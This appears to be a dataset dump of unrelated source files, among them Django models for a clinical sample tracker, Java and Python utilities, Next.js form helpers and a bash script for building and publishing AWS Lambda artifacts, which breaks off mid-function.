text
stringlengths
1
1.05M
from django.contrib.auth.models import User
from django.db import models

from openfacstrack.apps.core.models import TimeStampedModel

# OpenFacsTrack Models
# Note: Django will automatically add a primary key field named id to all
# models unless overridden


class Patient(TimeStampedModel):
    """A study participant, referenced by an external patient identifier."""

    patient_id = models.CharField(max_length=10, unique=True)

    def __str__(self):
        return "PatientID:" + self.patient_id


class PatientMetadataDict(TimeStampedModel):
    """Dictionary of allowed patient-metadata keys (name + documentation)."""

    name = models.CharField(max_length=255)
    description = models.CharField(max_length=255, null=True)
    notes = models.CharField(max_length=255, null=True, blank=True)

    def __str__(self):
        # description and notes are nullable; str() coerces None instead of
        # raising TypeError on string concatenation.
        return ", ".join(
            [
                "Metadata Key:" + self.name,
                "Description:" + str(self.description),
                "notes:" + str(self.notes),
            ]
        )


class PatientMetadata(TimeStampedModel):
    """A key/value metadata entry attached to a patient."""

    class Meta:
        unique_together = (("patient", "metadata_key"),)

    patient = models.ForeignKey(Patient, on_delete=models.CASCADE)
    metadata_key = models.ForeignKey(PatientMetadataDict, on_delete=models.CASCADE)
    metadata_value = models.CharField(max_length=255)

    def __str__(self):
        return ", ".join(
            [
                "Patient ID:" + self.patient.patient_id,
                "Metadata Key:" + self.metadata_key.name,
                "Metadata value:" + self.metadata_value,
            ]
        )


def user_directory_path(instance, filename):
    """Build the upload path for a user's file: uploads/user_<id>/<filename>."""
    return "uploads/user_{0}/{1}".format(instance.user.id, filename)


class UploadedFile(TimeStampedModel):
    """A file uploaded by a user, with validation state and a content type."""

    CONTENT_TYPE = [
        ("PANEL_RESULTS", "Panel results"),
        ("PATIENT_DATA", "Patient data"),
        ("OTHER", "Other"),
    ]

    name = models.CharField(max_length=255)
    # NOTE(review): blank=True without null=True on a ForeignKey lets forms
    # omit the user while the DB still requires one - confirm intent.
    user = models.ForeignKey(User, blank=True, on_delete=models.DO_NOTHING)
    description = models.CharField(max_length=255)
    row_number = models.IntegerField(default=0)
    content = models.FileField(blank=True, upload_to=user_directory_path)
    valid_syntax = models.BooleanField(default=True)
    valid_model = models.BooleanField(default=True)
    # Fixed: default=None on a NOT NULL text column raised IntegrityError
    # whenever notes was not supplied; Django convention is default="".
    notes = models.TextField(blank=True, default="")
    content_type = models.CharField(max_length=20, choices=CONTENT_TYPE)

    def __str__(self):
        return ", ".join(
            [
                "File name:" + self.name,
                "Uploaded:" + str(self.created),
                "Description:" + self.description,
            ]
        )


class ValidationEntry(TimeStampedModel):
    """A single validation message produced while checking an uploaded file."""

    ENTRY_TYPE = [
        ("INFO", "INFO"),
        ("ERROR", "ERROR"),
        ("WARN", "WARN"),
        ("FATAL", "FATAL"),
    ]
    VALIDATION_TYPE = [("SYNTAX", "SYNTAX"), ("MODEL", "MODEL")]

    subject_file = models.ForeignKey(UploadedFile, on_delete=models.CASCADE)
    entry_type = models.CharField(max_length=12, choices=ENTRY_TYPE, default="INFO")
    validation_type = models.CharField(
        max_length=12, choices=VALIDATION_TYPE, default="SYNTAX"
    )
    key = models.CharField(max_length=240)
    value = models.TextField()

    def __str__(self):
        return ", ".join(
            [
                "File ID:" + str(self.subject_file.id),
                "Key:" + str(self.key),
                "Value:" + str(self.value),
            ]
        )


class ProcessedSample(TimeStampedModel):
    """A physical clinical sample and the measurements taken when processing it."""

    clinical_sample_id = models.CharField(max_length=12, unique=True)
    patient = models.ForeignKey(Patient, on_delete=models.CASCADE)
    # This is meant to store the date a physical sample was acquired - not
    # the date some of it was processed in a panel. That is stored in the
    # date_values table against the particular panel.
    date_acquired = models.DateField(blank=True, null=True)
    biobank_id = models.CharField(max_length=12)
    n_heparin_tubes = models.IntegerField(blank=True, null=True)
    n_paxgene_tubes = models.IntegerField(blank=True, null=True)
    bleed_time = models.TimeField(blank=True, null=True)
    processed_time = models.TimeField(blank=True, null=True)
    blood_vol = models.FloatField(blank=True, null=True)
    lymph_conc_as_MLNmL = models.FloatField(blank=True, null=True)
    total_lymph = models.FloatField(blank=True, null=True)
    vol_frozen_mL = models.FloatField(blank=True, null=True)
    freeze_time = models.TimeField(blank=True, null=True)
    # This is to store comments about the sample - not about panel results!
    # NOTE(review): no blank=True here, so admin/forms will require a value -
    # confirm whether comments should be optional.
    comments = models.TextField()
    real_pbmc_frozen_stock_conc_MLNmL = models.FloatField(blank=True, null=True)

    def __str__(self):
        return ", ".join(
            [
                "Clinical sample ID:" + self.clinical_sample_id,
                "Biobank ID:" + self.biobank_id,
                "Date acquired:" + str(self.date_acquired),
            ]
        )


class StoredSample(TimeStampedModel):
    """A frozen aliquot of a processed sample and its physical storage location."""

    processed_sample = models.ForeignKey(ProcessedSample, on_delete=models.CASCADE)
    stored_sample_id = models.CharField(max_length=10, unique=True)
    location = models.CharField(max_length=255)
    type_of_stored_material = models.CharField(max_length=255)
    from_which_tube_type = models.CharField(max_length=255)
    freezer = models.CharField(max_length=255)
    box = models.IntegerField()
    row = models.IntegerField()
    position = models.IntegerField()
    comments = models.TextField()

    def __str__(self):
        # Fixed: date_acquired lives on the related ProcessedSample (this
        # model has no such field), and DateField values must be stringified
        # before concatenation; also added the missing colon after
        # "Stored Sample ID" for consistency.
        return ", ".join(
            [
                "Clinical sample ID:" + self.processed_sample.clinical_sample_id,
                "Biobank ID:" + self.processed_sample.biobank_id,
                "Date acquired:" + str(self.processed_sample.date_acquired),
                "Stored Sample ID:" + self.stored_sample_id,
            ]
        )


class Result(TimeStampedModel):
    """One panel run over a processed sample with a given gating strategy."""

    class Meta:
        unique_together = (
            "processed_sample",
            "panel",
            "gating_strategy",
            "data_processing",
        )

    processed_sample = models.ForeignKey(ProcessedSample, on_delete=models.CASCADE)
    uploaded_file = models.ForeignKey(
        UploadedFile, on_delete=models.DO_NOTHING, null=True, blank=True
    )
    panel = models.ForeignKey("Panel", on_delete=models.CASCADE)
    # NOTE(review): blank=True without null=True - forms may omit the gating
    # strategy but the DB column is NOT NULL; confirm intent.
    gating_strategy = models.ForeignKey(
        "GatingStrategy", blank=True, on_delete=models.DO_NOTHING
    )
    data_processing = models.OneToOneField("DataProcessing", on_delete=models.CASCADE)

    def __str__(self):
        return ", ".join(
            [
                "Clinical sample ID:" + self.processed_sample.clinical_sample_id,
                "Panel:" + self.panel.name,
                "Gating strategy:" + self.gating_strategy.strategy,
            ]
        )


class Panel(TimeStampedModel):
    """A named flow-cytometry panel."""

    name = models.CharField(max_length=255)

    def __str__(self):
        return "Panel name: " + self.name


class PanelMetadata(TimeStampedModel):
    """A key/value metadata entry attached to a panel."""

    panel = models.ForeignKey(Panel, on_delete=models.CASCADE)
    key = models.CharField(max_length=255)
    value = models.CharField(max_length=255)

    def __str__(self):
        # Fixed: this model has no `name` field - report its own key instead.
        return ", ".join(["Panel name:" + self.panel.name, "Metadata:" + self.key])


class Parameter(TimeStampedModel):
    """A measurable/derived parameter belonging to a panel."""

    DATA_TYPE = [
        ("PanelNumeric", "Numeric parameter from panel"),
        ("SampleNumeric", "Numeric metadata from sample"),
        ("DerivedNumeric", "Numeric derived parameter from panel"),
        ("Text", "Text"),
        ("Date", "Date"),
        ("Derived", "Derived"),
        ("Other", "Other"),
    ]

    panel = models.ForeignKey(Panel, on_delete=models.CASCADE)
    data_type = models.CharField(max_length=20, choices=DATA_TYPE)
    internal_name = models.CharField(max_length=255)
    public_name = models.CharField(max_length=255)
    display_name = models.CharField(max_length=255)
    excel_column_name = models.CharField(max_length=255)
    description = models.TextField()
    is_reference_parameter = models.BooleanField(blank=True, null=True)
    # NOTE(review): unique=True on a TextField is not supported by all DB
    # backends (e.g. MySQL needs a key length) - confirm target database.
    gating_hierarchy = models.TextField(unique=True)
    unit = models.CharField(max_length=255)
    ancestral_population = models.CharField(max_length=255)
    population_for_counts = models.CharField(max_length=255)

    def __str__(self):
        return ", ".join(
            [
                "Panel name:" + self.panel.name,
                "Parameter:" + self.display_name,
                "Type: " + self.data_type,
                "Internal name:" + self.internal_name,
                "Excel column name:" + self.excel_column_name,
            ]
        )


class DataProcessing(TimeStampedModel):
    """Provenance of the FCS file processed for a panel."""

    panel = models.ForeignKey(Panel, on_delete=models.CASCADE)
    fcs_file_name = models.CharField(max_length=255, unique=True)
    fcs_file_location = models.CharField(max_length=255)
    is_in_FlowRepository = models.BooleanField(blank=True, null=True)
    # is_automated_gating_done = models.BooleanField(blank=True, null=True)

    def __str__(self):
        return ", ".join(
            [
                "Panel name:" + self.panel.name,
                "FCS file:"
                + self.fcs_file_name
                + "(location: "
                + self.fcs_file_location
                + ")",
            ]
        )


class NumericValue(TimeStampedModel):
    """A numeric value for one (result, parameter) pair."""

    class Meta:
        unique_together = ("result", "parameter")

    result = models.ForeignKey(Result, on_delete=models.CASCADE)
    parameter = models.ForeignKey(Parameter, on_delete=models.CASCADE)
    value = models.FloatField(null=True)

    def __str__(self):
        return ", ".join(
            [
                "Clinical sample ID:"
                + self.result.processed_sample.clinical_sample_id,
                "Parameter:" + self.parameter.gating_hierarchy,
                # "Parameter:" + self.parameter.display_name,
                "Value:" + str(self.value),
            ]
        )


class TextValue(TimeStampedModel):
    """A text value for one (result, parameter) pair."""

    class Meta:
        unique_together = ("result", "parameter")

    result = models.ForeignKey(Result, on_delete=models.CASCADE)
    parameter = models.ForeignKey(Parameter, on_delete=models.CASCADE)
    value = models.TextField(null=True)

    def __str__(self):
        # value is nullable; str() avoids a TypeError when it is None.
        return ", ".join(
            [
                "Clinical sample ID:"
                + self.result.processed_sample.clinical_sample_id,
                "Parameter:" + self.parameter.display_name,
                "Value:" + str(self.value),
            ]
        )


class DateValue(TimeStampedModel):
    """A date value for one (result, parameter) pair."""

    class Meta:
        unique_together = ("result", "parameter")

    result = models.ForeignKey(Result, on_delete=models.CASCADE)
    parameter = models.ForeignKey(Parameter, on_delete=models.CASCADE)
    value = models.DateField(null=True)

    def __str__(self):
        # value is nullable; guard before strftime to avoid AttributeError.
        formatted = self.value.strftime("%d/%m/%Y") if self.value else "None"
        return ", ".join(
            [
                "Clinical sample ID:"
                + self.result.processed_sample.clinical_sample_id,
                "Parameter:" + self.parameter.display_name,
                "Value:" + formatted,
            ]
        )


class GatingStrategy(TimeStampedModel):
    """A named gating strategy applied when analysing panel results."""

    strategy = models.CharField(max_length=100)

    def __str__(self):
        # Added for consistency with the other models in this module.
        return "Gating strategy:" + self.strategy
# Configuration for remapping cat (Felis catus) variation features onto the
# Ensembl release 95 assembly via the eHive Remapping pipeline.

# Command/alias used to obtain connection options for the hive database server.
HIVE_SRV=mysql-ens-var-prod-1-ensadmin

# Working directory where the remapping pipeline writes its output.
pipeline_dir=/hps/nobackup2/production/ensembl/anja/release_95/cat/remapping/

# Initialise the eHive pipeline. "$($HIVE_SRV details hive)" expands to the
# -host/-port/-user/-pass options for the hive database.
# NOTE(review): the trailing backslash suggests further options followed in
# the original invocation - confirm the command is complete.
init_pipeline.pl Bio::EnsEMBL::Variation::Pipeline::Remapping::RemappingVariationFeature_conf \
$($HIVE_SRV details hive) \
-pipeline_name remapping_cat \
-pipeline_dir ${pipeline_dir} \
-ensembl_release 95 \
-species cat \
import styled, { createGlobalStyle } from 'styled-components';

// Global stylesheet injected once at the application root: resets default
// spacing, makes the app chain fill the viewport, and sets base typography.
export default createGlobalStyle`
  /* Reset margins/padding and use border-box sizing everywhere. */
  * {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    outline: 0;
  }

  /* Stretch the whole app chain to the full viewport height. */
  html, body, #root, .App {
    height: 100vh;
  }

  body {
    background: #FFF;
    color: #000;
    -webkit-font-smoothing: antialiased;
  }

  body, input, button {
    font-family: 'Roboto Slab', serif;
    font-size: 16px;
  }

  h1, h2, h3, h4, h5, h6, strong {
    font-weight: 500;
  }

  button {
    cursor: pointer;
  }

  .ContentPage {
    height: auto;
    display: flex;
    align-items: stretch;
    padding: 16px
  }
`;

// Centered page container: 75% width on desktop, full width on small screens.
export const Container = styled.div`
  width: 75%;
  height: auto;
  min-height: 100vh;
  display: flex;
  flex-direction: column;
  margin: auto;
  background: #f7f7f7;
  box-shadow: 0px 0px 16px rgb(0 0 0 / 20%);

  @media (max-width: 600px) {
    width: 100%;
  }
`;
package org.allenai.ml.util;

import lombok.val;
import org.testng.annotations.Test;

import java.io.*;
import java.util.stream.Stream;

import static org.testng.Assert.*;

/**
 * Unit tests for the read-only {@code Indexer} collection: de-duplication,
 * index lookups, immutability, and save/load round-tripping.
 */
@Test
public class IndexerTest {

    // "cap" appears twice in the source stream; the indexer is expected to
    // de-duplicate, hence size() == 3 and lastIndexOf("cap") == 0 below.
    private final static Indexer<String> avengers = Indexer.fromStream(Stream.of("cap", "iron-man", "hulk", "cap"));

    // Basic read operations: size, index lookups, membership, array and
    // sub-list views.
    public void testIndexer() {
        assertFalse( avengers.isEmpty() );
        assertTrue( avengers.size() == 3 );
        assertTrue( avengers.indexOf("cap") == 0 );
        assertTrue( avengers.lastIndexOf("cap") == 0 );
        assertTrue( avengers.get(0).equals("cap") );
        assertTrue( avengers.contains("cap") );
        assertFalse(avengers.contains("made-up"));
        Object[] arr = avengers.toArray();
        assertEquals( arr, new String[]{"cap", "iron-man", "hulk"} );
        assertEquals( avengers, avengers.subList(0, avengers.size()) );
    }

    // The indexer is immutable: mutating List operations must throw.
    @Test(expectedExceptions = RuntimeException.class)
    public void testIndexerThrowsRemove() {
        Indexer.fromStream(Stream.of("a", "b", "c")).remove(0);
    }

    @Test(expectedExceptions = RuntimeException.class)
    public void testIndexerThrowsAdd() {
        Indexer.fromStream(Stream.of("a", "b", "c")).add("d");
    }

    // Serialize to an in-memory byte stream and read back; the round-tripped
    // indexer must compare equal to the original.
    public void testSaveLoadRoundtrip() throws IOException {
        val baos = new ByteArrayOutputStream(3200);
        val dos = new DataOutputStream(baos);
        avengers.save(dos);
        val dis = new DataInputStream(new ByteArrayInputStream(baos.toByteArray()));
        val otherAvengers = Indexer.load(dis);
        assertEquals(avengers, otherAvengers);
    }
}
from collections import Counter
from typing import Dict, List

# Punctuation stripped from the ends of each token before counting.
_PUNCTUATION = ".,!?;:"


def process_text(text_list: List[str]) -> Dict[str, int]:
    """Count case-insensitive word frequencies across a list of strings.

    Each string is split on whitespace; leading/trailing punctuation
    (.,!?;:) is stripped from every token and tokens are lower-cased.
    Tokens that become empty after stripping are ignored.

    Args:
        text_list: Strings to aggregate; may be empty.

    Returns:
        Mapping of normalized word to its number of occurrences.
    """
    # Counter replaces the manual dict.get(...) + 1 accumulation loop.
    words = (token.strip(_PUNCTUATION).lower() for token in " ".join(text_list).split())
    return dict(Counter(word for word in words if word))
import random
import string

# Lowercase hexadecimal alphabet (0-9, a-f). The original expression
# string.hexdigits[:-6] relied on the ordering of hexdigits to drop the
# uppercase letters; this spells the intent out explicitly.
_HEX_LOWER = string.digits + "abcdef"


def generate_revision_identifier(length: int = 11) -> str:
    """Generate a random lowercase-hexadecimal revision identifier.

    Args:
        length: Number of hex characters to produce. Defaults to 11,
            preserving the original fixed-length behaviour.

    Returns:
        A string of ``length`` characters drawn from 0-9a-f.

    Note:
        Uses the ``random`` module, which is not cryptographically secure;
        suitable for revision labels, not for secrets.
    """
    return "".join(random.choice(_HEX_LOWER) for _ in range(length))
import os

import imageio
import numpy as np
import cv2


def run(basedir, input_path, output_path, model_path, resize_height=288):
    """Run MonoDepthNN to compute depth maps.

    Fixed: the original used os.listdir/os.path.join without importing os,
    which raised NameError at runtime.

    Args:
        basedir (str): Base directory for the input and output paths.
        input_path (str): Folder (relative to basedir) containing the images
            for which depth maps are computed.
        output_path (str): Folder (relative to basedir) where the computed
            depth maps are saved.
        model_path (str): Path to the pre-trained MonoDepthNN model.
        resize_height (int): Height the input images are resized to before
            processing. Default is 288.

    Returns:
        None

    Note:
        load_model, preprocess_input, postprocess_depth_map and to8b are
        assumed to be defined elsewhere in this module/package - confirm.
    """
    # Load the pre-trained MonoDepthNN model.
    model = load_model(model_path)

    # Hoisted: the directories are loop-invariant.
    input_dir = os.path.join(basedir, input_path)
    output_dir = os.path.join(basedir, output_path)

    for file in os.listdir(input_dir):
        input_image = cv2.imread(os.path.join(input_dir, file))

        # Resize to the target height, preserving the aspect ratio.
        new_width = int(input_image.shape[1] * resize_height / input_image.shape[0])
        input_image = cv2.resize(input_image, (new_width, resize_height))

        # Preprocess, predict, and post-process the depth map.
        input_image = preprocess_input(input_image)
        depth_map = model.predict(input_image)
        depth_map = postprocess_depth_map(depth_map)

        # Save as <name>_depth.png in the output folder.
        output_filename = os.path.join(output_dir, file.split(".")[0] + "_depth.png")
        cv2.imwrite(output_filename, to8b(depth_map))

    return None
-- Fetch every column for the employees whose IDs are 1, 2 or 3.
-- NOTE(review): SELECT * is brittle if the table schema changes; consider
-- listing only the columns the caller actually needs.
SELECT * FROM employees WHERE employeeId IN (1, 2, 3);
<reponame>logicbomb12/TextBlackJack<filename>src/Main.java import BJ.*; public class Main { public static void main(String[] args) { Game bj = new Game(); bj.run(); } }
package org.vertx.tests.core.appmanager;

import org.testng.annotations.Test;
import org.vertx.java.core.Handler;
import org.vertx.java.core.SimpleHandler;
import org.vertx.java.core.app.AppManager;
import org.vertx.java.core.app.AppType;
import org.vertx.java.core.app.cli.DeployCommand;
import org.vertx.java.core.app.cli.SocketDeployer;
import org.vertx.java.core.app.cli.UndeployCommand;
import org.vertx.java.core.app.cli.VertxCommand;
import org.vertx.java.core.buffer.Buffer;
import org.vertx.java.core.http.HttpClient;
import org.vertx.java.core.http.HttpClientResponse;
import org.vertx.java.core.internal.VertxInternal;
import org.vertx.java.core.logging.Logger;
import org.vertx.java.core.net.NetClient;
import org.vertx.java.core.net.NetSocket;
import org.vertx.java.core.parsetools.RecordParser;
import org.vertx.tests.core.TestBase;

import java.net.URL;
import java.util.ArrayList;
import java.util.HashSet;
import java.util.List;
import java.util.Set;
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.TimeUnit;

/**
 * Integration tests for {@link AppManager}: deploys a test app through the
 * socket-based CLI deployer, fires HTTP requests at it on localhost:8080,
 * and inspects how responses are distributed across app instances.
 *
 * @author <a href="http://tfox.org"><NAME></a>
 */
public class AppManagerTest extends TestBase {

  private static final Logger log = Logger.getLogger(AppManagerTest.class);

  // With enough requests, round-robin distribution should produce one
  // distinct response per deployed instance.
  @Test
  public void testRequestsDistributedJava() throws Exception {
    int instances = 4;
    List<String> results = doTest(AppType.JAVA, "com.acme.someapp.TestApp1", instances, 10);
    Set<String> set = new HashSet<>();
    for (String res: results) {
      set.add(res);
    }
    azzert(set.size() == instances);
  }

  // Each instance runs in its own classloader, so a static counter in the
  // app must read 1 for every request (no sharing between instances).
  @Test
  public void testIsolationJava() throws Exception {
    int instances = 4;
    List<String> results = doTest(AppType.JAVA, "com.acme.someapp.TestApp2", instances, 10);
    Set<String> set = new HashSet<>(); // NOTE(review): unused - left as-is
    //Each instance should have its own static counter
    for (String res: results) {
      azzert(Integer.parseInt(res) == 1);
    }
  }

  /**
   * Deploys {@code main} with the given instance count, issues
   * {@code requests} HTTP GETs against it, undeploys, stops the manager and
   * returns the collected response bodies.
   */
  private List<String> doTest(AppType appType, final String main, final int instances, final int requests) throws Exception {
    AppManager mgr = new AppManager(SocketDeployer.DEFAULT_PORT);
    mgr.startNoBlock();
    // Give the manager's socket deployer a moment to start listening.
    Thread.sleep(100);
    URL url = null;
    if (appType == AppType.JAVA) {
      //We need to get the URL to the root directory of where the classes are so we can use that URL
      //in another classloader to load the classes
      String classFile = main.replace('.', '/') + ".class";
      url = getClass().getClassLoader().getResource(classFile);
      String surl = url.toString();
      String surlroot = surl.substring(0, surl.length() - classFile.length());
      url = new URL(surlroot);
    }
//    else if (appType == AppType.RUBY) {
//      url = getClass().getClassLoader().getResource(main);
//      String surl = url.toString();
//      String surlroot = surl.substring(0, surl.length() - main.length());
//      url = new URL(surlroot);
//      log.info("url is " + url);
//    }
    final List<String> ret = new ArrayList<>();
    final CountDownLatch latch = new CountDownLatch(requests);
    DeployCommand cmd = new DeployCommand(appType, "myapp", main, new URL[] {url}, instances);
    sendCommand(cmd);
    // Allow the deployment to complete before issuing requests.
    Thread.sleep(200);
    VertxInternal.instance.go(new Runnable() {
      public void run() {
        for (int i = 0; i < requests; i++) {
          final HttpClient client = new HttpClient();
          client.setPort(8080).setHost("localhost").getNow("/", new Handler<HttpClientResponse>() {
            public void handle(HttpClientResponse response) {
              // Accumulate the body, then record it when the response ends.
              final Buffer buff = Buffer.create(0);
              response.dataHandler(new Handler<Buffer>() {
                public void handle(Buffer data) {
                  buff.appendBuffer(data);
                }
              });
              response.endHandler(new SimpleHandler() {
                public void handle() {
                  String result = buff.toString();
                  // ret is shared across event-loop callbacks.
                  synchronized (ret) {
                    ret.add(result);
                  }
                  client.close();
                  latch.countDown();
                }
              });
            }
          });
        }
      }
    });
    azzert(latch.await(5, TimeUnit.SECONDS));
    sendCommand(new UndeployCommand("myapp"));
    final CountDownLatch stopLatch = new CountDownLatch(1);
    mgr.stop(new SimpleHandler() {
      public void handle() {
        stopLatch.countDown();
      }
    });
    azzert(stopLatch.await(5, TimeUnit.SECONDS));
    return ret;
  }

  /**
   * Writes a deployer command to the manager's socket and waits (up to 5s)
   * for the newline-delimited "OK" acknowledgement.
   */
  private void sendCommand(final VertxCommand command) throws Exception {
    final CountDownLatch latch = new CountDownLatch(1);
    VertxInternal.instance.go(new Runnable() {
      public void run() {
        final NetClient client = new NetClient();
        client.connect(SocketDeployer.DEFAULT_PORT, "localhost", new Handler<NetSocket>() {
          public void handle(NetSocket socket) {
            socket.dataHandler(RecordParser.newDelimited("\n", new Handler<Buffer>() {
              public void handle(Buffer buff) {
                String line = buff.toString();
                azzert(line.equals("OK"));
                client.close();
                latch.countDown();
              }
            }));
            command.write(socket, null);
          }
        });
      }
    });
    azzert(latch.await(5, TimeUnit.SECONDS));
  }
}
<!-- Header-only table (Name / Age / Gender). Data rows are presumably
     appended elsewhere (e.g. by script or a template loop) - confirm. -->
<table>
  <tr>
    <th>Name</th>
    <th>Age</th>
    <th>Gender</th>
  </tr>
</table>
// Utilities for "connext" form handling in a Next.js app:
// - getFormSubmission: server-side helper that parses a POSTed JSON body.
// - connextFormSubmit: client-side submit handler that posts form data to
//   the page's /_next/data endpoint and resolves the returned pageProps.
// - getFormData and helpers: build a nested object from input `name` paths
//   such as "user.addresses[0].city".

// Parse the raw request body of a POST as JSON; resolves false for any other
// HTTP method. NOTE(review): JSON.parse throws on a malformed body - confirm
// upstream error handling.
async function getFormSubmission(req: any) {
  return new Promise((resolve) => {
    if (req.method == "POST") {
      let body = "";
      req.on("data", (chunk: any) => {
        body += chunk;
      });
      req.on("end", () => {
        resolve(JSON.parse(body));
      });
    } else {
      resolve(false);
    }
  });
}

// Client-side submit: serialize the form, POST it to the Next.js data route
// for the current page and build, then stream-decode the JSON response.
async function connextFormSubmit(ev: any) {
  ev.preventDefault();
  const { buildId } = window.__NEXT_DATA__;
  const page = window.location.pathname;
  const data_obj = getFormData(ev.target);
  const data = await fetch(`/_next/data/${buildId}/en${page}.json`, {
    headers: {
      "Content-Type": "application/json",
    },
    method: "POST",
    body: JSON.stringify(data_obj),
  });
  return new Promise((resolve) => {
    const reader = data.body?.getReader();
    let value = "";
    // Recursively drain the response stream, accumulating decoded text, and
    // resolve with the parsed pageProps once the stream reports done.
    reader?.read().then(function processText(data): any {
      if (data.done) {
        resolve(JSON.parse(value).pageProps);
        return;
      }
      value += new TextDecoder().decode(data.value);
      return reader.read().then(processText);
    });
  });
}

// Collect every [name]-attributed element of the form into a nested object,
// interpreting dotted paths and [n] suffixes as nested objects/arrays.
function getFormData(form: any) {
  const namedElements = form.querySelectorAll("[name]");
  const return_data = {};
  namedElements.forEach((elm: any) => {
    const path = elm.getAttribute("name");
    const [name, idx] = getLastProperty(path);
    const data_object = constructObjectFromPath(return_data, path);
    const val = getValue(elm);
    if (idx !== null) {
      // Array leaf: ensure the array exists, then assign by index.
      data_object[name] = data_object[name] || [];
      data_object[name][idx] = val;
    } else {
      data_object[name] = val;
    }
  });
  return return_data;
}

// Walk (and lazily create) the containers addressed by every path segment
// except the last; returns the innermost container the leaf belongs to.
function constructObjectFromPath(data_obj: any, path: any) {
  const path_split = path.split(".");
  path_split.pop(); // the final segment is the leaf, handled by the caller
  if (path_split.length === 0) return data_obj;
  path_split.forEach((prop: any) => {
    data_obj = tryAddArray(data_obj, prop) || addObject(data_obj, prop);
  });
  return data_obj;
}

// Return the last path segment and, when it is an array access such as
// "items[2]", its numeric index (otherwise null).
function getLastProperty(path: string): [string, null | number] {
  const arrPathRegex = /[[\]]/g;
  const lastProp = path.split(".").at(-1);
  if (!lastProp) return [path, null];
  if (arrPathRegex.test(lastProp)) return getArrayNameAndIndex(lastProp);
  return [lastProp, null];
}

// Split "name[3]" into ["name", 3]; throws when the index is missing.
function getArrayNameAndIndex(prop: string): [string, number] {
  const arrPathRegex = /[[\]]/g;
  const arr_split = prop.split(arrPathRegex);
  const propName = arr_split[0];
  const index = arr_split[1];
  if (arr_split.length > 1 && index) return [propName, parseInt(index)];
  throw new Error(
    `Array Path '${prop}' needs an index. Do not leave [] index empty... must have an integer index, ie: [0]`
  );
}

// If prop is an array segment ("name[2]"), ensure data_obj[name] is an array
// and return the object at that index; otherwise return undefined so the
// caller falls back to addObject.
function tryAddArray(data_obj: any, prop: any) {
  const arrPathRegex = /[[\]]/g;
  if (!arrPathRegex.test(prop)) return undefined;
  const [propName, index] = getArrayNameAndIndex(prop);
  data_obj[propName] = data_obj[propName] || [];
  return addObject(data_obj[propName], index);
}

// Ensure data_obj[prop] exists as an object and return it.
function addObject(data_obj: any, prop: any) {
  data_obj[prop] = data_obj[prop] || {};
  return data_obj[prop];
}

// Read an element's value, defaulting to the empty string.
function getValue(elm: any) {
  if (elm.value) return elm.value;
  return "";
}

export { getFormSubmission, connextFormSubmit };
#!/usr/bin/env bash
# A helper tool to assist us maintaining lambda functions
# Intention here is to keep this file and all its functions reusable for all Telemetry repositories

set -o errexit
set -o nounset

#####################################################################
## Beginning of the configurations ##################################
BASE_LOCATION="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"
PROJECT_FULL_NAME=$(basename "${BASE_LOCATION}")
PROJECT_NAME=$(echo "${PROJECT_FULL_NAME}" | sed 's/aws-lambda-//')

PATH_BUILD="${BASE_LOCATION}/build"
PATH_CF_TEMPLATE="${PATH_BUILD}/${PROJECT_NAME}-cf-template.yaml"
PATH_SAM_RESOURCES="${BASE_LOCATION}/resources/aws-sam-cli/"

S3_TELEMETRY_LAMBDA_ROOT="telemetry-internal-base-lambda-artifacts"
S3_LAMBDA_SUB_FOLDER="build-${PROJECT_FULL_NAME}"
S3_ADDRESS="s3://${S3_TELEMETRY_LAMBDA_ROOT}/${S3_LAMBDA_SUB_FOLDER}"
## End of the configurations ########################################
#####################################################################

# Prepare dependencies and build the Lambda function code using SAM
assemble() {
    print_begins

    mkdir -p "${PATH_BUILD}"
    poetry export --without-hashes --format requirements.txt --output "${PATH_BUILD}/requirements.txt"
    SAM_CLI_TELEMETRY=0 poetry run sam build ${SAM_USE_CONTAINER:=""} --template-file "${PATH_SAM_RESOURCES}/template.yaml" --manifest "${PATH_BUILD}/requirements.txt" --region eu-west-2

    print_completed
}

# Creates a release tag in the repository
cut_release() {
    print_begins

    poetry run cut-release

    print_completed
}

# Bump the function's version when appropriate
prepare_release() {
    print_begins

    poetry run prepare-release
    export_version

    print_completed
}

# Take all the necessary steps to build and publish both lambda function's zip and checksum files
publish() {
    print_begins

    assemble
    publish_artifacts_to_s3
    rename_artifacts_in_s3
    publish_checksum_file

    print_completed
}

# Package and upload artifacts to S3 using poetry installed SAM
publish_artifacts_to_s3() {
    print_begins

    export_version

    # Unfortunately Poetry won't allow us to add awscli to the --dev
    # dependencies due to transitive dependency conflicts with aws-sam-cli.
    # Until the conflicts are resolved we have to use pip to install awscli.
    # Commenting this as I dont see why it is needed here also I expect
    # awscli to be installed in the codebuild instance
    # pip install awscli

    SAM_CLI_TELEMETRY=0 poetry run sam package --region eu-west-2 \
        --s3-bucket "${S3_TELEMETRY_LAMBDA_ROOT}" \
        --s3-prefix "${S3_LAMBDA_SUB_FOLDER}" \
        --output-template-file="${PATH_CF_TEMPLATE}"

    print_completed
}

# Download the artifacts zip file and generate its checksum file to be stored alongside it
publish_checksum_file() {
    print_begins

    export_version
    export FILE_NAME="aws-lambda-${PROJECT_NAME}.${VERSION}.zip"
    export HASH_FILE_NAME="${FILE_NAME}.base64sha256.txt"

    aws s3 cp "${S3_ADDRESS}/${FILE_NAME}" "${PATH_BUILD}/${FILE_NAME}"
    # Fixed two bugs here:
    # 1. `echo -n "<path>" | openssl dgst` hashed the literal path STRING,
    #    not the file contents - the digest now reads the file itself.
    # 2. The checksum file is named *.base64sha256.txt (the format Terraform's
    #    base64sha256/filebase64sha256 produce), but the digest used -sha1;
    #    it now uses -sha256 to match the advertised format.
    openssl dgst -binary -sha256 <"${PATH_BUILD}/${FILE_NAME}" | openssl base64 >"${PATH_BUILD}/${HASH_FILE_NAME}"
    aws s3 cp "${PATH_BUILD}/${HASH_FILE_NAME}" "${S3_ADDRESS}/${HASH_FILE_NAME}" \
        --content-type text/plain --acl=bucket-owner-full-control

    print_completed
}

# Rename SAM generated package to the expected format by terraform,
# to be picked up during provisioning of the AWS "Lambda function" resource
rename_artifacts_in_s3() {
    print_begins

    export_version
    export S3_KEY_FILENAME=$(grep S3Key "${PATH_CF_TEMPLATE}" | cut -d : -f 2 | cut -d / -f 2 | sed 's/\s*//g')

    # Using mv instead of cp will require updating the codebuild's service-role to grant DeleteObject permission
    aws s3 mv "${S3_ADDRESS}/${S3_KEY_FILENAME}" "${S3_ADDRESS}/aws-lambda-${PROJECT_NAME}.${VERSION}.zip" \
        --acl=bucket-owner-full-control

